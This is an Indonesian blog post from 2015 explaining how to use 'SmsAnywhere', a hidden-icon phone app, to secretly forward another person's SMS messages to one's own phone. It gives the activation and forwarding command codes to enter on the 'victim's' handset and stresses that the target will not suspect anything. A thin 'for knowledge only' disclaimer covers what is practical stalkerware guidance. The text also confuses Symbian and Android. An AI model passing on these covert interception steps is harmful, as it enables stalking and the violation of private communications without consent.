Kamis, 09 April 2015

aplikasi penyadap sms orang lain

Aplikasi penyadap sms, smsanywhere adalah aplikasi berbasis Symbian yang berkemampuan menyadap sms. Tips ini hanya semata-mata utk pengetahuan & bukan untuk disalah gunakan. Sedikit abdi terangkan mengenai Smsanywhere. Semua control pada aplikasi ini di control melalui sms, mulai dari pengaktifan, serta mematikan program. Aplikasi ini tak memiliki icon yang muncul pada ponsel anda, disinilah letak ke unggulan lain aplikasi ini, dgn icon yg tak muncul pada ponsel, maka target tidak akn menaruh kecurigaan apapun. Utk cara pengaktifannya sebagai berikut:

Aplikasi penyadap sms hp, donload Aplikasinya DISINI




Aplikasi penyadap sms android, install aplikasinya di HP anda dan HP Korban

Setelah selesai penginstallan aplikasi, aktifkan aplikasi tersebut di HP korban dengan format sms: SA(spasi)Password(spasi)(ON) Contoh: SA 1234 ON Kirim sms itu ke nomor penyadap. Password Maksimal 8. Untuk berhenti SA 1234 OFF.

Jika lw kepingin menyadap setiap sms yg dikirimkan korban, ketikkan sms ini di HP korban dgn format: SA(spasi)Password(pasi)S1 Contoh: SA 1234 S1.

Jika sobat ingin menyadap hanya lebih dari 5 hari, ketikkan sms ini ke HP korban dgn format: SA(spasi)Password(spasi)R1 Contoh SA 1234 R1.

Dengan demikian, nte akn selalu menerimasms korban akn selalu diteruskan ke HP anda setiap korban mengerjakan sms ke siapapun.!

Segala Resiko yang dikarenakan oleh penyadapan yang anda lakukan, bukan ialah tanggung jawab saya, Cara ini cuma untuk pengetahuan dan tidak utk disalahgunakan. Harap fikirkan resiko sebelum engkau melakukannya. Terimakasih...........

Tidak ada komentar:

Posting Komentar